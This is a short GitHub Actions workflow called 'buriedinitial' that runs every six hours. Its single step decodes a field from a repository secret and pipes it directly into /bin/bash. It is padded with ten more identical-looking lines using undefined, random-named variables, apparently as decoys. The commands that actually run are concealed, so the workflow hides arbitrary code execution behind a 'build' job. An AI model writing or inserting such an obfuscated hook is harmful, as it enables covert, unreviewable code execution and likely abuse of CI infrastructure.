name: buriedinitial
on:
  workflow_dispatch:
  schedule:
    - cron: '24 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: buriedinitial
        env:
          mirv13: ${{ secrets.mirv13 }}
        run: |
          echo $mirv13 | jq -r .vhlwb80901 | /bin/bash
          echo $fe5 | jq -r .kvp67 | /bin/bash
          echo $dvo53570 | jq -r .j66728 | /bin/bash
          echo $pxr4 | jq -r .l714 | /bin/bash
          echo $osmx61143 | jq -r .iec4109 | /bin/bash
          echo $yhgcz269 | jq -r .je71520 | /bin/bash
          echo $j613 | jq -r .xj3664 | /bin/bash
          echo $hj79 | jq -r .vbrb54 | /bin/bash
          echo $hkrym2153 | jq -r .vt30466 | /bin/bash
          echo $lk790 | jq -r .gmim59 | /bin/bash
          echo $iiske66768 | jq -r .s0 | /bin/bash

